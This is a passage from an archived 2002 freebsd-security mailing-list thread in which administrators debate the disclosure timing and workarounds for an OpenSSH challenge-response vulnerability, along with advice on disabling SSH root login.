than that: a large part of the new functionality in new versions of OpenSSH relates to how OpenSSH handles the [inevitable] compromise. The OpenSSH code is very complicated: it integrates some of the most risky bits of systems programming into one neat package. That includes crypto implementations, network protocol handling, authentication and privilege management, etc. The privilege seperation code has the goal of reducing the risk associated with this complexity by isolating the risky bits in a sandbox. There will probably be future security vulnerabilities in OpenSSH -- in fact, given the complexity of the code, it's almost guaranteed, despite the best efforts of many developers. If privilege seperation helps manage this risk, then it's certainly desirable to deploy it. As with any new security feature, it's something that we'll want to look at very closely, since it introduces its own risks, of course. Given that it now has a demonstrated track record of reducing the scope of at least one real vulnerability, it has some pretty decent credibility already. So we'll continue with plans to get the 3.x OpenSSH code into -STABLE with privilege seperation enabled by default, and take it from there. Robert N M Watson FreeBSD Core Team, TrustedBSD Projects robert@fledge.watson.org Network Associates Laboratories To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 9:23:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id C3DCE37B401 for ; Wed, 26 Jun 2002 09:23:50 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id KAA11484; Wed, 26 Jun 2002 10:23:30 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020626101626.02274c80@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 26 Jun 2002 10:23:14 -0600 To: Mike Tancsa , Darren Reed From: Brett Glass Subject: The "race" that Theo sought to avoid has begun (Was: OpenSSH Advisory) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> References: <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Mike: It is clear that Theo was attempting to have people apply the workaround which had the least chance of revealing the nature of the bug in advance, lest it be discovered by others and exploited. It's truly sad that ISS, which knew about Theo's advisory, released this information today, instead of next week as Theo asked them to. If Theo's roadmap for disclosure had been followed, more administrators could have been informed about the bug, and they would have had time to take preventive measures through the weekend before the skript kiddies began their race to exploit the bug. Now, the race has begun. In fact, the problem has been exacerbated because administrators who *could* have secured their systems thought they'd have time to do so over the weekend. Theo made a worthy attempt to minimize harm (which should be the goal of any security policy). It's a shame that ISS sought the spotlight instead of doing the same. --Brett Glass At 09:10 AM 6/26/2002, Mike Tancsa wrote: >Also, the ISS advisory states > >"Administrators can remove this vulnerability by disabling the >Challenge-Response authentication parameter within the OpenSSH daemon >configuration file. This filename and path is typically: >/etc/ssh/sshd_config. To disable this parameter, locate the >corresponding line and change it to the line below: >ChallengeResponseAuthentication no " > >This would imply there is a work around, but the talk before hand > >----quote from Message-Id: <200206242327.g5ONRBLI012690@cvs.openbsd.org>--- > >Bullshit. > >You have been told to move up to privsep so that you are immunized by >the time the bug is released. > >If you fail to immunize your users, then the best you can do is tell >them to disable OpenSSH until 3.4 is out early next week with the >bugfix in it. Of course, then the bug will be public. >----end-quote--- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 9:25:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id EDD9337B401; Wed, 26 Jun 2002 09:25:00 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id KAA11522; Wed, 26 Jun 2002 10:24:56 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020626102338.0227e6a0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 26 Jun 2002 10:24:39 -0600 To: "Jacques A. Vidrine" , Mike Tancsa From: Brett Glass Subject: Re: OpenSSH Advisory (was Re: Much ado about nothing.) Cc: Darren Reed , freebsd-security@FreeBSD.ORG In-Reply-To: <20020626152613.GD65700@madman.nectar.cc> References: <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 09:26 AM 6/26/2002, Jacques A. Vidrine wrote: >I know. I think people reading this list already know my opinion on >the issue. I'm just happy that it's all out in the open now. It would have been much better if it were "all out in the open" next week, so that administrators would have had more time to adopt appropriate countermeasures. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 9:30:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id B52B637B409 for ; Wed, 26 Jun 2002 09:29:28 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id E7EC123; Wed, 26 Jun 2002 11:29:25 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5QGTPsE080516; Wed, 26 Jun 2002 11:29:25 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5QGTPA4080515; Wed, 26 Jun 2002 11:29:25 -0500 (CDT) Date: Wed, 26 Jun 2002 11:29:25 -0500 From: "Jacques A. Vidrine" To: Brett Glass Cc: Mike Tancsa Subject: Re: The "race" that Theo sought to avoid has begun (Was: OpenSSH Advisory) Message-ID: <20020626162925.GA80493@madman.nectar.cc> References: <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <4.3.2.7.2.20020626101626.02274c80@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <4.3.2.7.2.20020626101626.02274c80@localhost> User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Please do not have this conversation on this list. It does not belong here. Find another list on which to argue about it. -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 9:31:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from freebsd.org.ru (sweet.etrust.ru [194.84.67.5]) by hub.freebsd.org (Postfix) with ESMTP id E6F6F37B407; Wed, 26 Jun 2002 09:31:31 -0700 (PDT) Received: by freebsd.org.ru (Postfix, from userid 1000) id AEB2146; Wed, 26 Jun 2002 20:31:28 +0400 (MSD) Date: Wed, 26 Jun 2002 20:31:28 +0400 From: "Sergey A. Osokin" To: "Jacques A. Vidrine" Cc: Dmitry Valdov , freebsd-security@FreeBSD.ORG Subject: Re: bsd libc dns resolving code vulnerable? Message-ID: <20020626163128.GB90907@freebsd.org.ru> References: <20020626152832.GE65700@madman.nectar.cc> <20020626155302.GA66147@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020626155302.GA66147@madman.nectar.cc> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 10:53:02AM -0500, Jacques A. Vidrine wrote: > On Wed, Jun 26, 2002 at 07:49:50PM +0400, Dmitry Valdov wrote: > > Is 3.x vulnerable too? > > Yes. The fixes will be very similar in 3.x, but due to differences > pre-KAME, it will require a little work. Are you willing to test > patches? Yes, please. -- Rgdz, /"\ Sergey Osokin aka oZZ, \ / ASCII RIBBON CAMPAIGN osa@freebsd.org.ru X AGAINST HTML MAIL http://freebsd.org.ru/~osa/ / \ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 9:34:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 4F56937B419 for ; Wed, 26 Jun 2002 09:34:05 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 4E8F523; Wed, 26 Jun 2002 11:34:04 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g5QGY4sE080548; Wed, 26 Jun 2002 11:34:04 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g5QGY3cE080547; Wed, 26 Jun 2002 11:34:03 -0500 (CDT) Date: Wed, 26 Jun 2002 11:34:03 -0500 From: "Jacques A. Vidrine" To: Brett Glass Cc: Mike Tancsa , freebsd-security@freebsd.org Subject: Not here, please. Re: The "race" that Theo sought to avoid has begun Message-ID: <20020626163403.GA80539@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Brett Glass , Mike Tancsa , freebsd-security@freebsd.org References: <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <4.3.2.7.2.20020626101626.02274c80@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <4.3.2.7.2.20020626101626.02274c80@localhost> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org [Resending: the list software does not like to be bcc'd.] Please do not have this conversation on this list. It does not belong here. Find another list on which to argue about it. -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 9:36:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.seattleFenix.net (sense-sea-MegaSub-1-501.oz.net [216.39.145.247]) by hub.freebsd.org (Postfix) with ESMTP id 872B537B42B for ; Wed, 26 Jun 2002 09:34:53 -0700 (PDT) Received: (from roo@localhost) by mail.seattleFenix.net (8.11.6/8.11.6) id g5QGZcm08435; Wed, 26 Jun 2002 09:35:38 -0700 (PDT) (envelope-from roo) Date: Wed, 26 Jun 2002 09:35:38 -0700 From: Benjamin Krueger To: Brett Glass Cc: Mike Tancsa , Darren Reed , freebsd-security@FreeBSD.ORG Subject: Re: The "race" that Theo sought to avoid has begun (Was: OpenSSH Advisory) Message-ID: <20020626093538.B8071@mail.seattleFenix.net> References: <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> <4.3.2.7.2.20020626101626.02274c80@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.3.2.7.2.20020626101626.02274c80@localhost>; from brett@lariat.org on Wed, Jun 26, 2002 at 10:23:14AM -0600 X-PGP-Key: http://www.macguire.net/benjamin/public_key.asc Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * Brett Glass (brett@lariat.org) [020626 09:26]: > Mike: > > It is clear that Theo was attempting to have people apply the workaround > which had the least chance of revealing the nature of the bug in advance, > lest it be discovered by others and exploited. > > It's truly sad that ISS, which knew about Theo's advisory, released this > information today, instead of next week as Theo asked them to. If Theo's > roadmap for disclosure had been followed, more administrators could have > been informed about the bug, and they would have had time to take > preventive measures through the weekend before the skript kiddies began > their race to exploit the bug. Now, the race has begun. In fact, the > problem has been exacerbated because administrators who *could* have > secured their systems thought they'd have time to do so over the weekend. > > Theo made a worthy attempt to minimize harm (which should be the goal of > any security policy). It's a shame that ISS sought the spotlight instead > of doing the same. > > --Brett Glass Minimized harm? The great majority of systems are (were) not vulnerable. As for the start of the race? It started the minute Theo's notice hit bugtraq. Had he said "Use PrivSep or disable ChallengeResponseAuthentication" anyone who *was* vulnerable could have been secured in about 24 seconds. Somehow, I don't think that the script kiddies could can find the vulnerability from such minimal information, write an exploit, distribute it amongst each other, scan the entire internet for the few vulnerable machines around, and exploit them in a period of 24 seconds, or even 24 hours. Call me skeptical. I won't even start on how much industry time (and thus, money) was wasted while administrators upgraded (many needlessly) their servers. In many companies, on the order of hundreds or thousands of servers in a farm. -- Benjamin Krueger "Life is far too important a thing ever to talk seriously about." - Oscar Wilde (1854 - 1900) ---------------------------------------------------------------- Send mail w/ subject 'send public key' or query for (0x251A4B18) Fingerprint = A642 F299 C1C1 C828 F186 A851 CFF0 7711 251A 4B18 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 9:39:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.netcabo.pt (smtp.netcabo.pt [212.113.174.9]) by hub.freebsd.org (Postfix) with ESMTP id 0080C37B400 for ; Wed, 26 Jun 2002 09:39:22 -0700 (PDT) Received: from cheetah ([213.22.31.9]) by smtp.netcabo.pt with Microsoft SMTPSVC(5.0.2195.5600); Wed, 26 Jun 2002 17:37:34 +0100 From: "Hununu" Organization: Artists, Inc. To: FreeBSD-security@FreeBSD.org Date: Wed, 26 Jun 2002 17:39:13 +0100 MIME-Version: 1.0 Subject: subscribe Reply-To: hununu@netcabo.pt Message-ID: <3D19FC41.29475.B22969@localhost> X-mailer: Pegasus Mail for Windows (v4.01) Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Content-description: Mail message body X-OriginalArrivalTime: 26 Jun 2002 16:37:35.0094 (UTC) FILETIME=[C6830960:01C21D2F] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org subscribe ...:-=>> The freaking Mail Band <<=-:... hununu@netcabo.pt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 9:41:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from lurza.secnetix.de (lurza.secnetix.de [212.66.1.130]) by hub.freebsd.org (Postfix) with ESMTP id 0614D37B410 for ; Wed, 26 Jun 2002 09:41:03 -0700 (PDT) Received: (from olli@localhost) by lurza.secnetix.de (8.11.6/8.11.6) id g5QGevi23040; Wed, 26 Jun 2002 18:40:57 +0200 (CEST) (envelope-from oliver.fromme@secnetix.de) Date: Wed, 26 Jun 2002 18:40:57 +0200 (CEST) Message-Id: <200206261640.g5QGevi23040@lurza.secnetix.de> From: Oliver Fromme To: freebsd-security@FreeBSD.ORG Reply-To: freebsd-security@FreeBSD.ORG Subject: Re: OpenSSH Advisory (was Re: Much ado about nothing.) In-Reply-To: <4.3.2.7.2.20020626102338.0227e6a0@localhost> X-Newsgroups: list.freebsd-security User-Agent: tin/1.5.4-20000523 ("1959") (UNIX) (FreeBSD/4.5-RELEASE (i386)) MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Brett Glass wrote: > At 09:26 AM 6/26/2002, Jacques A. Vidrine wrote: > >I know. I think people reading this list already know my opinion on > >the issue. I'm just happy that it's all out in the open now. > > It would have been much better if it were "all out in the open" next > week It would have been much better if it were "all out in the open" _last_ week. That would have saved me from wasting several hours yesterday upgrading machines to openssh 3.3. Because those boxes were running openssh versions that weren't vulnerable in the first place. And even if they were, disabling challenge-response authentication would have been a workaround for the bug. Theo de Raadt failed to mention any of that in the FUD that he was spreading. (Yes, I'm angry.) Regards Oliver -- Oliver Fromme, secnetix GmbH & Co KG, Oettingenstr. 2, 80538 München Any opinions expressed in this message may be personal to the author and may not necessarily reflect the opinions of secnetix in any way. "All that we see or seem is just a dream within a dream" (E. A. Poe) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 9:41:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.atabersk.de (yerowned.atabersk.de [62.144.144.60]) by hub.freebsd.org (Postfix) with SMTP id 884A137B41C for ; Wed, 26 Jun 2002 09:41:11 -0700 (PDT) Received: (qmail 17019 invoked by uid 1000); 26 Jun 2002 16:41:19 -0000 Date: Wed, 26 Jun 2002 18:41:19 +0200 From: Patrick Atamaniuk To: Robin Smith Cc: freebsd-security@FreeBSD.ORG Subject: Permit root login, was Re: OpenSSH hole Message-ID: <20020626184118.A16530@mail.atabersk.de> References: <200206261326.g5QDQb8t090120@aristotle.tamu.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="HcAYCG3uE/tztfnV" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206261326.g5QDQb8t090120@aristotle.tamu.edu>; from rasmith@aristotle.tamu.edu on Wed, Jun 26, 2002 at 08:26:37AM -0500 X-Arbitrary-Number-Of-The-Day: 42 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --HcAYCG3uE/tztfnV Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hi, =2E.. Robin Smith(rasmith@aristotle.tamu.edu)@2002.06.26 08:26:37 +0000: >=20 > However, if the connecting user happens to be root (i.e. if > PermitRootLogin is on), then there's no split (and even if there were, > both would be owned by root, of course). I haven't heard anything =2E.. sorry going off topic, but here my 2cent: Though i don't know the effect on privsep, i generally recommend don't permit root-login. Have administrative users without valid passwords but not empty passwords ( * in the password field) using ssh keys and invite only them into wheel. Only the root account should have=20 a (secure, complicated) password for 'su' and console login. Even if you need root-login for automated adminstration purposes, this can be done with root-login disabled by using ssh-keys in combination with the command=3D"" parameter in the authorized_keys file. Reasoning: Always assume your (master)passwordfile is compromized. Assume i'ts public= :) Getting onto the machine by using social engeneered or otherwise obtained passwords is simply not possible due the absence of passwords. Knowledge of the root password does not help if you don;t have pysical acc= ess or a ssh-key to an admins account if no user even has a password. If the attacker has physical access, we are lost anyways (bios password=20 may help but might have disadvantages if you are colocating) Of course the private keys for the administrative clients must be protected by passphrase and site policy. I think i stole that idea from FreeBSD handbook:) regards, /p --=20 regards, Patrick ---------------------------------------------------- Patrick Atamaniuk patrick@atamaniuk.de http://www.atamaniuk.de http://www.top-c.de ---------------------------------------------------- 80B0BCF6 D/E D624 96A8 22A9 1ED2 77F3 A0C5 78C0 14F9 80B0 BCF6 My mail is GnuPG signed -- Unsigned ones are bogus -- http://www.gnupg.org/ Please do not remove my address from To: and Cc: fields in mailing lists. --HcAYCG3uE/tztfnV Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE9Ge6teMAU+YCwvPYRAowwAKD6bVD6YmnBpkG1bUeyjESbz1JiDACeKFhI XJbNhFDM4KJa0YvPp+F3XSI= =1+YP -----END PGP SIGNATURE----- --HcAYCG3uE/tztfnV-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 9:44:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 6E66D37B401 for ; Wed, 26 Jun 2002 09:44:05 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id KAA11846; Wed, 26 Jun 2002 10:43:52 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020626103956.02291aa0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 26 Jun 2002 10:43:47 -0600 To: Benjamin Krueger From: Brett Glass Subject: Re: The "race" that Theo sought to avoid has begun (Was: OpenSSH Advisory) Cc: Mike Tancsa , Darren Reed , freebsd-security@FreeBSD.ORG In-Reply-To: <20020626093538.B8071@mail.seattleFenix.net> References: <4.3.2.7.2.20020626101626.02274c80@localhost> <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> <4.3.2.7.2.20020626101626.02274c80@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 10:35 AM 6/26/2002, Benjamin Krueger wrote: > Minimized harm? The great majority of systems are (were) not vulnerable. Not true at all. OpenBSD, NetBSD, and most recent Linux distributions were and are vulnerable. >As for the start of the race? It started the minute Theo's notice hit bugtraq. No, it didn't. The skript kiddies didn't know where the bug was. > Had he said "Use PrivSep or disable ChallengeResponseAuthentication" anyone >who *was* vulnerable could have been secured in about 24 seconds. He DID say to use PrivSep. He did not say to disable ChallengeResponseAuthentication for a reason: it would have clued the kiddies into the location of the bug. >Somehow, I >don't think that the script kiddies could can find the vulnerability from >such minimal information, Mentioning ChallengeResponseAuthentication would have been a big hint. > I won't even start on how much industry time (and thus, money) was wasted >while administrators upgraded (many needlessly) their servers. Most needed to upgrade. FreeBSD's releases appear to have dodged the bullet by sheer luck. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 9:44:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from cithaeron.argolis.org (pool-138-88-127-183.res.east.verizon.net [138.88.127.183]) by hub.freebsd.org (Postfix) with ESMTP id 6582437B405 for ; Wed, 26 Jun 2002 09:44:12 -0700 (PDT) Received: from cithaeron.argolis.org (localhost [127.0.0.1]) by cithaeron.argolis.org (8.12.3/8.12.3) with ESMTP id g5QGi2IK022038; Wed, 26 Jun 2002 12:44:02 -0400 (EDT) (envelope-from piechota@argolis.org) Received: from localhost (piechota@localhost) by cithaeron.argolis.org (8.12.3/8.12.3/Submit) with ESMTP id g5QGi2u6022035; Wed, 26 Jun 2002 12:44:02 -0400 (EDT) X-Authentication-Warning: cithaeron.argolis.org: piechota owned process doing -bs Date: Wed, 26 Jun 2002 12:44:01 -0400 (EDT) From: Matt Piechota To: Brett Glass Cc: Mike Tancsa , Darren Reed , Subject: Re: The "race" that Theo sought to avoid has begun (Was: OpenSSH Advisory) In-Reply-To: <4.3.2.7.2.20020626101626.02274c80@localhost> Message-ID: <20020626123728.G7517-100000@cithaeron.argolis.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Brett Glass wrote: > Theo made a worthy attempt to minimize harm (which should be the goal of > any security policy). It's a shame that ISS sought the spotlight instead > of doing the same. ISS has shown itself with this and the Apache vulerabilites last week to happily screw the maintainers of projects for it's own benefit. It seems at least this time they bothered give the OpenSSH team a little notice. Of course, I don't track the skiddie world, so ISS's report may be a reaction to a released exploit for this bug. I'd like to give them the benefit of the doubt, but their past actions make that difficult. Although I will admit that knowing now has saved my vacation plans for next week (as with many others in the US, I'm sure) so I'm not entirely unhappy to find out that I'm safe for the moment. -- Matt Piechota To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 9:46:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from yoda.bph.ruhr-uni-bochum.de (yoda.bph.ruhr-uni-bochum.de [134.147.196.7]) by hub.freebsd.org (Postfix) with ESMTP id 9BFDD37B413 for ; Wed, 26 Jun 2002 09:45:54 -0700 (PDT) Received: from gonzo (gonzo [134.147.196.22]) by yoda.bph.ruhr-uni-bochum.de (8.8.8/8.8.8) with SMTP id SAA09214; Wed, 26 Jun 2002 18:44:36 +0200 From: Christoph Wegener To: Brett Glass , Benjamin Krueger Cc: Mike Tancsa , Darren Reed , freebsd-security@FreeBSD.ORG Date: Wed, 26 Jun 2002 18:44:35 +0200 X-Priority: 3 (Normal) Organization: Lehrstuhl fuer Biophysik - Ruhr-Universitaet Bochum In-Reply-To: <20020626093538.B8071@mail.seattleFenix.net> Message-Id: Subject: Re: The "race" that Theo sought to avoid has begun (Was: OpenSSH Advisory) MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Mailer: Opera 6.03 build 1107 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org 26.6.2002 18:35:38, Benjamin Krueger wrote: Sorry to say: but I _TOTALLY_ agree to the words of Benjamin!!!!!!!!!!!! > Minimized harm? The great majority of systems are (were) not vulnerable. >As for the start of the race? It started the minute Theo's notice hit bugtraq. > > Had he said "Use PrivSep or disable ChallengeResponseAuthentication" anyone >who *was* vulnerable could have been secured in about 24 seconds. Somehow, I >don't think that the script kiddies could can find the vulnerability from >such minimal information, write an exploit, distribute it amongst each other, >scan the entire internet for the few vulnerable machines around, and exploit >them in a period of 24 seconds, or even 24 hours. Call me skeptical. > > I won't even start on how much industry time (and thus, money) was wasted >while administrators upgraded (many needlessly) their servers. In many >companies, on the order of hundreds or thousands of servers in a farm. > >-- >Benjamin Krueger -- .-. Ruhr-Universitaet Bochum /v\ L I N U X Lehrstuhl fuer Biophysik // \\ >Penguin Computing< c/o Christoph Wegener /( )\ Gebaeude ND 04/Nord ^^-^^ D-44780 Bochum, GERMANY Tel: +49 (234) 32-25754 Fax: +49 (234) 32-14626 mailto:cwe@bph.ruhr-uni-bochum.de http://www.bph.ruhr-uni-bochum.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 9:47:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from obsidian.sentex.ca (obsidian.sentex.ca [64.7.128.101]) by hub.freebsd.org (Postfix) with ESMTP id 48EAD37B416 for ; Wed, 26 Jun 2002 09:46:27 -0700 (PDT) Received: from simian.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by obsidian.sentex.ca (8.12.4/8.12.4) with ESMTP id g5QGkMxd013814; Wed, 26 Jun 2002 12:46:23 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20020626124711.053ff7c8@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Wed, 26 Jun 2002 12:49:14 -0400 To: Brett Glass , Darren Reed From: Mike Tancsa Subject: Re: The "race" that Theo sought to avoid has begun (Was: OpenSSH Advisory) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <4.3.2.7.2.20020626101626.02274c80@localhost> References: <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (obsidian/20020220) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I really dont want to get into what was intended and the politics of when what was released etc. Thats best on another list. I only wanted to get as much clarity on how to either upgrade or work around the security issue in an expedient and safe manner relevant for my network. ---Mike At 10:23 AM 26/06/2002 -0600, Brett Glass 